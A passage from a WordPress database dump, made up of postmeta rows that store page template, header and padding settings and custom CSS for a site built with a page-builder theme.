vc_custom_1533285714962{padding-right: 0px !important;padding-left: 0px !important;}'),(31259,3044,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31260,3044,'_wp_page_template','default'),(31261,3044,'slide_template','default'),(31262,3044,'_wpb_vc_js_status','false'),(31263,3044,'mkdf_page_content_behind_header_meta','no'),(31264,3044,'mkdf_disable_vertical_header_background_image_meta','no'),(31265,3044,'mkdf_disable_header_widget_areas_meta','no'),(31266,3044,'mkdf_show_title_area_meta','yes'),(31267,3044,'mkdf_title_area_type_meta','attika'),(31268,3044,'mkdf_menu_area_background_color_meta','#ffffff'),(31269,3044,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(31270,3044,'mkdf_page_content_padding','150px 0'),(31271,3045,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31272,3045,'_wp_page_template','full-width.php'),(31273,3045,'slide_template','default'),(31274,3045,'_wpb_vc_js_status','true'),(31275,3045,'mkdf_page_content_behind_header_meta','no'),(31276,3045,'mkdf_disable_vertical_header_background_image_meta','no'),(31277,3045,'mkdf_disable_header_widget_areas_meta','no'),(31278,3045,'mkdf_show_title_area_meta','yes'),(31279,3045,'mkdf_title_area_type_meta','attika'),(31280,3045,'mkdf_menu_area_background_color_meta','#ffffff'),(31281,3045,'_wpb_shortcodes_custom_css','.vc_custom_1535549530866{padding-top: 50px !important;padding-bottom: 120px !important;}'),(31282,3045,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(31283,3046,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31284,3046,'_wpb_shortcodes_custom_css','.vc_custom_1535549496113{padding-top: 50px !important;padding-bottom: 120px !important;}'),(31285,3046,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31286,3046,'_wp_page_template','full-width.php'),(31287,3046,'slide_template','default'),(31288,3046,'_wpb_vc_js_status','true'),(31289,3046,'mkdf_page_content_behind_header_meta','no'),(31290,3046,'mkdf_disable_vertical_header_background_image_meta','no'),(31291,3046,'mkdf_disable_header_widget_areas_meta','no'),(31292,3046,'mkdf_show_title_area_meta','yes'),(31293,3046,'mkdf_title_area_type_meta','attika'),(31294,3046,'mkdf_menu_area_background_color_meta','#ffffff'),(31295,3046,'_wpb_shortcodes_custom_css','.vc_custom_1535549496113{padding-top: 50px !important;padding-bottom: 120px !important;}'),(31296,3046,'_dp_original','377'),(31297,3046,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(31298,3047,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31299,3047,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31300,3047,'_wp_page_template','full-width.php'),(31301,3047,'slide_template','default'),(31302,3047,'_wpb_vc_js_status','true'),(31303,3047,'mkdf_page_content_behind_header_meta','no'),(31304,3047,'mkdf_disable_vertical_header_background_image_meta','no'),(31305,3047,'mkdf_disable_header_widget_areas_meta','no'),(31306,3047,'mkdf_show_title_area_meta','yes'),(31307,3047,'mkdf_title_area_type_meta','attika'),(31308,3047,'mkdf_menu_area_background_color_meta','#ffffff'),(31309,3047,'_dp_original','377'),(31310,3047,'mkdf_page_content_padding','80px 0 140px'),(31311,3047,'mkdf_page_content_padding_mobile','0px 0px 0px 0px'),(31312,3047,'_wpb_shortcodes_custom_css','.vc_custom_1535372522645{padding-right: 80px !important;padding-left: 80px !important;}'),(31313,3047,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(31314,3048,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31315,3048,'_wpb_shortcodes_custom_css','.vc_custom_1534510995016{padding-right: 0px !important;padding-left: 0px !important;}'),(31316,3048,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31317,3048,'_wp_page_template','full-width.php'),(31318,3048,'slide_template','default'),(31319,3048,'_wpb_vc_js_status','true'),(31320,3048,'mkdf_page_content_behind_header_meta','no'),(31321,3048,'mkdf_disable_vertical_header_background_image_meta','no'),(31322,3048,'mkdf_disable_header_widget_areas_meta','no'),(31323,3048,'mkdf_page_content_padding','0'),(31324,3048,'mkdf_header_type_meta','header-divided'),(31325,3048,'mkdf_show_title_area_meta','no'),(31326,3048,'mkdf_menu_area_background_color_meta','#ffffff'),(31327,3048,'mkdf_menu_area_background_transparency_meta','1'),(31328,3048,'mkdf_menu_area_height_meta','80'),(31329,3048,'mkdf_disable_footer_meta','yes'),(31330,3048,'mkdf_header_behaviour_meta','fixed-on-scroll'),(31331,3048,'_wpb_shortcodes_custom_css','.vc_custom_1534510995016{padding-right: 0px !important;padding-left: 0px !important;}'),(31332,3048,'_dp_original','351'),(31333,3049,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31334,3049,'_wp_page_template','full-width.php'),(31335,3049,'slide_template','default'),(31336,3049,'_wpb_vc_js_status','true'),(31337,3049,'mkdf_page_content_behind_header_meta','no'),(31338,3049,'mkdf_disable_vertical_header_background_image_meta','no'),(31339,3049,'mkdf_disable_header_widget_areas_meta','no'),(31340,3049,'_wpb_shortcodes_custom_css','.vc_custom_1535113284246{padding-top: 130px !important;}.vc_custom_1534171353151{padding-top: 65px !important;padding-bottom: 130px !important;}'),(31341,3049,'mkdf_page_content_padding','0'),(31342,3049,'mkdf_header_type_meta','header-divided'),(31343,3049,'mkdf_show_title_area_meta','no'),(31344,3050,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31345,3050,'_wpb_shortcodes_custom_css','.vc_custom_1535634921180{padding-top: 130px !important;padding-bottom: 120px !important;}.vc_custom_1534159322757{padding-bottom: 90px !important;}.vc_custom_1533304689022{padding-bottom: 60px !important;}.vc_custom_1535112631536{padding-right: 5% !important;padding-left: 5% !important;}.vc_custom_1534163857016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165933476{padding-right: 0px !important;}.vc_custom_1535112595718{margin-left: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110087401{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110136872{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}'),(31346,3050,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31347,3050,'_wp_page_template','full-width.php'),(31348,3050,'slide_template','default'),(31349,3050,'_wpb_vc_js_status','true'),(31350,3050,'mkdf_page_content_behind_header_meta','no'),(31351,3050,'mkdf_disable_vertical_header_background_image_meta','no'),(31352,3050,'mkdf_disable_header_widget_areas_meta','no'),(31353,3050,'_wpb_shortcodes_custom_css','.vc_custom_1535634921180{padding-top: 130px !important;padding-bottom: 120px !important;}.vc_custom_1534159322757{padding-bottom: 90px !important;}.vc_custom_1533304689022{padding-bottom: 60px !important;}.vc_custom_1535112631536{padding-right: 5% !important;padding-left: 5% !important;}.vc_custom_1534163857016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165933476{padding-right: 0px !important;}.vc_custom_1535112595718{margin-left: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110087401{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110136872{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}'),(31354,3050,'mkdf_page_content_padding','0'),(31355,3050,'mkdf_header_type_meta','header-divided'),(31356,3050,'_dp_original','430'),(31357,3050,'mkdf_show_title_area_meta','no'),(31358,3051,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31359,3051,'_wp_page_template','full-width.php'),(31360,3051,'slide_template','default'),(31361,3051,'_wpb_vc_js_status','true'),(31362,3051,'mkdf_page_content_behind_header_meta','no'),(31363,3051,'mkdf_disable_vertical_header_background_image_meta','no'),(31364,3051,'mkdf_disable_header_widget_areas_meta','no'),(31365,3051,'mkdf_show_title_area_meta','no'),(31366,3051,'mkdf_page_content_padding','0'),(31367,3051,'_wpb_shortcodes_custom_css','.vc_custom_1534508236123{padding-right: 0px !important;}'),(31368,3051,'mkdf_disable_footer_meta','yes'),(31369,3052,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31370,3052,'_wp_page_template','full-width.php'),(31371,3052,'slide_template','default'),(31372,3052,'_wpb_vc_js_status','true'),(31373,3052,'mkdf_page_content_behind_header_meta','no'),(31374,3052,'mkdf_page_content_padding','130px 0 0 '),(31375,3052,'mkdf_disable_vertical_header_background_image_meta','no'),(31376,3052,'mkdf_disable_header_widget_areas_meta','no'),(31377,3052,'mkdf_show_title_area_meta','no'),(31378,3052,'_wpb_shortcodes_custom_css','.vc_custom_1533721367903{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1534512863336{padding-left: 0px !important;}'),(31379,3053,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31380,3053,'_wp_page_template','full-width.php'),(31381,3053,'slide_template','default'),(31382,3053,'_wpb_vc_js_status','true'),(31383,3053,'mkdf_page_content_behind_header_meta','no'),(31384,3053,'mkdf_page_content_padding','0 0 0 0'),(31385,3053,'mkdf_page_content_padding_mobile','0 0 0 0'),(31386,3053,'mkdf_header_type_meta','header-minimal'),(31387,3053,'mkdf_disable_vertical_header_background_image_meta','no'),(31388,3053,'mkdf_disable_header_widget_areas_meta','no'),(31389,3053,'mkdf_show_title_area_meta','no'),(31390,3053,'mkdf_disable_footer_meta','yes'),(31391,3053,'mkdf_custom_header_widget_area_two_meta','logo-fullscreen'),(31392,3054,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31393,3054,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31394,3054,'_wp_page_template','full-width.php'),(31395,3054,'slide_template','default'),(31396,3054,'_wpb_vc_js_status','true'),(31397,3054,'mkdf_page_content_behind_header_meta','no'),(31398,3054,'mkdf_page_content_padding','110px 0 0 '),(31399,3054,'mkdf_disable_vertical_header_background_image_meta','no'),(31400,3054,'mkdf_disable_header_widget_areas_meta','no'),(31401,3054,'_dp_original','513'),(31402,3054,'mkdf_show_title_area_meta','no'),(31403,3054,'_wpb_shortcodes_custom_css','.vc_custom_1533717792911{padding-top: 150px !important;padding-bottom: 150px !important;}.vc_custom_1534508595924{margin-top: -130px !important;}'),(31404,3055,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31405,3055,'_wp_page_template','default'),(31406,3055,'slide_template','default'),(31407,3055,'_wpb_vc_js_status','true'),(31408,3055,'mkdf_page_content_behind_header_meta','no'),(31409,3055,'mkdf_disable_vertical_header_background_image_meta','no'),(31410,3055,'mkdf_disable_header_widget_areas_meta','no'),(31411,3055,'mkdf_show_title_area_meta','no'),(31412,3055,'mkdf_disable_footer_meta','yes'),(31413,3055,'mkdf_menu_area_in_grid_meta','yes'),(31414,3055,'mkdf_header_type_meta','header-minimal'),(31415,3055,'mkdf_page_content_padding','0 0 0 0'),(31416,3055,'mkdf_page_content_padding_mobile','0 0 0 0'),(31417,3055,'mkdf_custom_header_widget_area_two_meta','logo-fullscreen'),(31418,3441,'_wpb_shortcodes_custom_css','.vc_custom_1535368696442{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1536934540610{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1535368707127{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535368714455{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535960592176{margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1535011548259{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011578720{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011594412{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011617855{padding-right: 0px !important;padding-left: 0px !important;}'),(31419,3441,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31420,3441,'_wp_page_template','full-width.php'),(31421,3441,'slide_template','default'),(31422,3441,'_wpb_vc_js_status','true'),(31423,3441,'mkdf_page_content_behind_header_meta','no'),(31424,3441,'mkdf_page_content_padding','0 0 0 0'),(31425,3441,'mkdf_page_content_padding_mobile','0 0 0 0'),(31426,3441,'mkdf_header_type_meta','header-vertical'),(31427,3441,'mkdf_disable_vertical_header_background_image_meta','no'),(31428,3441,'mkdf_disable_header_widget_areas_meta','no'),(31429,3441,'mkdf_show_title_area_meta','no'),(31430,3441,'_wpb_shortcodes_custom_css','.vc_custom_1535368696442{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1536934540610{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1535368707127{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535368714455{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535960592176{margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1535011548259{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011578720{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011594412{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011617855{padding-right: 0px !important;padding-left: 0px !important;}'),(31431,3441,'mkdf_custom_header_widget_area_one_meta','left-menu'),(31432,3441,'mkdf_disable_footer_meta','yes'),(31433,3057,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31434,3057,'_wpb_shortcodes_custom_css','.vc_custom_1533725150863{padding-top: 210px !important;padding-bottom: 200px !important;}.vc_custom_1534513038512{padding-bottom: 200px !important;}.vc_custom_1534514381983{padding-right: 0px !important;}.vc_custom_1534514542346{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514550307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514557722{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514436317{padding-left: 0px !important;}'),(31435,3057,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31436,3057,'_wp_page_template','full-width.php'),(31437,3057,'slide_template','default'),(31438,3057,'_wpb_vc_js_status','true'),(31439,3057,'mkdf_page_content_behind_header_meta','no'),(31440,3057,'mkdf_page_content_padding','130px 0 0 '),(31441,3057,'mkdf_disable_vertical_header_background_image_meta','no'),(31442,3057,'mkdf_disable_header_widget_areas_meta','no'),(31443,3057,'mkdf_show_title_area_meta','no'),(31444,3057,'_wpb_shortcodes_custom_css','.vc_custom_1533725150863{padding-top: 210px !important;padding-bottom: 200px !important;}.vc_custom_1534513038512{padding-bottom: 200px !important;}.vc_custom_1534514381983{padding-right: 0px !important;}.vc_custom_1534514542346{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514550307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514557722{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514436317{padding-left: 0px !important;}'),(31445,3057,'_dp_original','513'),(31446,3058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31447,3058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31448,3058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31449,3058,'_wp_page_template','full-width.php'),(31450,3058,'slide_template','default'),(31451,3058,'_wpb_vc_js_status','true'),(31452,3058,'mkdf_page_content_behind_header_meta','no'),(31453,3058,'mkdf_page_content_padding','130px 0 0'),(31454,3058,'mkdf_disable_vertical_header_background_image_meta','no'),(31455,3058,'mkdf_disable_header_widget_areas_meta','no'),(31456,3058,'mkdf_show_title_area_meta','no'),(31457,3058,'_dp_original','744'),(31458,3058,'_wpb_shortcodes_custom_css','.vc_custom_1535445887028{padding-top: 140px !important;padding-bottom: 35px !important;}.vc_custom_1535445909857{padding-bottom: 200px !important;}.vc_custom_1535380918653{padding-bottom: 40px !important;}.vc_custom_1534240845257{padding-bottom: 30px !important;}.vc_custom_1535446084271{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534234226432{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535445707647{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535382774510{padding-right: 0px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1535447972496{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535447959496{margin-top: -15px !important;margin-left: -30px !important;padding-top: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}'),(31459,3058,'_wpb_post_custom_css','.mkdf-row-parallax-background-elements-holder.mkdf-parallax-elements-top .mkdf-row-parallax-right{\n    top: 1%;\n}'),(31461,3059,'_wpb_shortcodes_custom_css','.vc_custom_1535635181617{padding-top: 130px !important;}.vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}.vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}'),(31463,3059,'_wp_page_template','full-width.php'),(31464,3059,'slide_template','default'),(31465,3059,'_wpb_vc_js_status','true'),(31466,3059,'mkdf_page_content_behind_header_meta','no'),(31467,3059,'mkdf_disable_vertical_header_background_image_meta','no'),(31468,3059,'mkdf_disable_header_widget_areas_meta','no'),(31469,3059,'_wpb_shortcodes_custom_css','.vc_custom_1535635181617{padding-top: 130px !important;}.vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}.vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}'),(31470,3059,'mkdf_page_content_padding','0'),(31471,3059,'mkdf_header_type_meta','header-divided'),(31472,3059,'mkdf_show_title_area_meta','no'),(31473,3059,'_dp_original','430'),(31474,3060,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31475,3060,'_wp_page_template','full-width.php'),(31476,3060,'slide_template','default'),(31477,3060,'_wpb_vc_js_status','true'),(31478,3060,'mkdf_page_content_behind_header_meta','no'),(31479,3060,'mkdf_page_content_padding','0 0 0 0 '),(31480,3060,'mkdf_page_content_padding_mobile','0 0 0 0'),(31481,3060,'mkdf_set_menu_area_position_meta','center'),(31482,3060,'mkdf_disable_vertical_header_background_image_meta','no'),(31483,3060,'mkdf_menu_area_background_color_meta','#ffffff'),(31484,3060,'mkdf_menu_area_background_transparency_meta','0.4'),(31485,3060,'mkdf_disable_header_widget_areas_meta','no'),(31486,3060,'mkdf_show_title_area_meta','no'),(31487,3060,'mkdf_disable_footer_meta','yes'),(31488,3060,'mkdf_header_type_meta','header-standard'),(31489,3060,'mkdf_custom_header_widget_area_one_meta','custom-opener'),(31490,3060,'mkdf_header_behaviour_meta','no-behavior'),(31491,3061,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31492,3061,'_wp_page_template','default'),(31493,3061,'slide_template','default'),(31494,3061,'_wpb_vc_js_status','false'),(31495,3061,'mkdf_page_content_behind_header_meta','no'),(31496,3061,'mkdf_disable_vertical_header_background_image_meta','no'),(31497,3061,'mkdf_disable_header_widget_areas_meta','no'),(31498,3062,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31499,3062,'_wp_page_template','default'),(31500,3062,'slide_template','default'),(31501,3062,'_wpb_vc_js_status','true'),(31502,3062,'mkdf_page_content_behind_header_meta','no'),(31503,3062,'mkdf_page_content_padding','120px 0 160px 0'),(31504,3062,'mkdf_page_content_padding_mobile','120px 0 160px 0'),(31505,3062,'mkdf_disable_vertical_header_background_image_meta','no'),(31506,3062,'mkdf_disable_header_widget_areas_meta','no'),(31507,3062,'mkdf_title_area_type_meta','attika'),(31508,3063,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31509,3063,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31510,3063,'_wp_page_template','default'),(31511,3063,'slide_template','default'),(31512,3063,'_wpb_vc_js_status','true'),(31513,3063,'mkdf_page_content_behind_header_meta','no'),(31514,3063,'mkdf_page_content_padding','122px 0 160px 0'),(31515,3063,'mkdf_page_content_padding_mobile','122px 0 160px 0'),(31516,3063,'mkdf_disable_vertical_header_background_image_meta','no'),(31517,3063,'mkdf_disable_header_widget_areas_meta','no'),(31518,3063,'mkdf_title_area_type_meta','attika'),(31519,3063,'_dp_original','1151'),(31520,3064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31521,3064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31522,3064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31523,3064,'_wp_page_template','full-width.php'),(31524,3064,'slide_template','default'),(31525,3064,'_wpb_vc_js_status','true'),(31526,3064,'mkdf_page_content_behind_header_meta','no'),(31527,3064,'mkdf_page_content_padding','30px 30px 50px 30px'),(31528,3064,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(31529,3064,'mkdf_disable_vertical_header_background_image_meta','no'),(31530,3064,'mkdf_disable_header_widget_areas_meta','no'),(31531,3064,'mkdf_title_area_type_meta','attika'),(31532,3064,'_dp_original','1160'),(31533,3065,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31534,3065,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31535,3065,'_wp_page_template','default'),(31536,3065,'slide_template','default'),(31537,3065,'_wpb_vc_js_status','true'),(31538,3065,'mkdf_page_content_behind_header_meta','no'),(31539,3065,'mkdf_page_content_padding','120px 0 170px 0'),(31540,3065,'mkdf_page_content_padding_mobile','120px 0 170px 0'),(31541,3065,'mkdf_disable_vertical_header_background_image_meta','no'),(31542,3065,'mkdf_disable_header_widget_areas_meta','no'),(31543,3065,'mkdf_title_area_type_meta','attika'),(31544,3065,'_dp_original','1151'),(31545,3066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31546,3066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31547,3066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31548,3066,'_wp_page_template','default'),(31549,3066,'slide_template','default'),(31550,3066,'_wpb_vc_js_status','true'),(31551,3066,'mkdf_page_content_behind_header_meta','no'),(31552,3066,'mkdf_page_content_padding','100px 0 100px 0'),(31553,3066,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(31554,3066,'mkdf_disable_vertical_header_background_image_meta','no'),(31555,3066,'mkdf_disable_header_widget_areas_meta','no'),(31556,3066,'mkdf_title_area_type_meta','attika'),(31557,3066,'_dp_original','1160'),(31558,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31559,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31560,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31561,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31562,3067,'_wp_page_template','full-width.php'),(31563,3067,'slide_template','default'),(31564,3067,'_wpb_vc_js_status','true'),(31565,3067,'mkdf_page_content_behind_header_meta','no'),(31566,3067,'mkdf_page_content_padding','30px 30px 50px 30px'),(31567,3067,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(31568,3067,'mkdf_disable_vertical_header_background_image_meta','no'),(31569,3067,'mkdf_disable_header_widget_areas_meta','no'),(31570,3067,'mkdf_title_area_type_meta','attika'),(31571,3067,'_dp_original','1167'),(31572,3068,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31573,3068,'_wp_page_template','full-width.php'),(31574,3068,'slide_template','default'),(31575,3068,'_wpb_vc_js_status','true'),(31576,3068,'mkdf_page_content_behind_header_meta','no'),(31577,3068,'mkdf_page_content_padding','0 0 0 0'),(31578,3068,'mkdf_page_content_padding_mobile','0 0 0 0'),(31579,3068,'mkdf_disable_header_meta','yes'),(31580,3068,'mkdf_disable_vertical_header_background_image_meta','no'),(31581,3068,'mkdf_disable_header_widget_areas_meta','no'),(31582,3068,'mkdf_show_title_area_meta','no'),(31583,3068,'_wpb_shortcodes_custom_css','.vc_custom_1534251303879{background-color: #eff5f8 !important;}.vc_custom_1534849547927{margin-top: -1px !important;}.vc_custom_1535374727085{padding-top: 76px !important;padding-bottom: 25px !important;}.vc_custom_1534409161900{padding-top: 8px !important;padding-bottom: 8px !important;}.vc_custom_1535968762401{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534848855900{padding-top: 0px !important;}.vc_custom_1534859739459{padding-top: 100px !important;}.vc_custom_1536850149982{padding-top: 0% !important;padding-bottom: 10% !important;}.vc_custom_1534927596297{margin-top: -500px !important;}.vc_custom_1534927611021{margin-top: -313px !important;}'),(31584,3068,'_wpb_post_custom_css','@media only screen and (min-width: 1025px) and (max-width: 1440px) {\n    #mkdf-back-to-top {\n        right: 55px; \n    }\n}'),(31585,3069,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31586,3069,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31587,3069,'_wp_page_template','full-width.php'),(31588,3069,'slide_template','default'),(31589,3069,'_wpb_vc_js_status','true'),(31590,3069,'mkdf_page_content_behind_header_meta','no'),(31591,3069,'mkdf_disable_vertical_header_background_image_meta','no'),(31592,3069,'mkdf_disable_header_widget_areas_meta','no'),(31593,3069,'mkdf_page_content_padding','80px 0 '),(31594,3069,'_dp_original','50'),(31595,3069,'_wpb_shortcodes_custom_css','.vc_custom_1534339141193{padding-bottom: 78px !important;}.vc_custom_1534253493197{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253549960{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253609963{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253600292{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253651419{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253670577{padding-top: 85px !important;}'),(31596,3070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31597,3070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31598,3070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31599,3070,'_wp_page_template','full-width.php'),(31600,3070,'slide_template','default'),(31601,3070,'_wpb_vc_js_status','true'),(31602,3070,'mkdf_page_content_behind_header_meta','no'),(31603,3070,'mkdf_disable_vertical_header_background_image_meta','no'),(31604,3070,'mkdf_disable_header_widget_areas_meta','no'),(31605,3070,'mkdf_page_content_padding','100px 0 110px'),(31606,3070,'_dp_original','1241'),(31607,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31608,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(31609,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31610,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31611,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31612,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(31613,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(31614,3071,'_wp_page_template','full-width.php'),(31615,3071,'slide_template','default'),(31616,3071,'_wpb_vc_js_status','true'),(31617,3071,'mkdf_page_content_behind_header_meta','no'),(31618,3071,'mkdf_disable_vertical_header_background_image_meta','no'),(31619,3071,'mkdf_disable_header_widget_areas_meta','no'),(31620,3071,'mkdf_page_content_padding','120px 0 140px'),(31621,3071,'_dp_original','1250'),(31622,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31623,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(31624,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31625,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31626,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31627,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31628,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(31629,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px 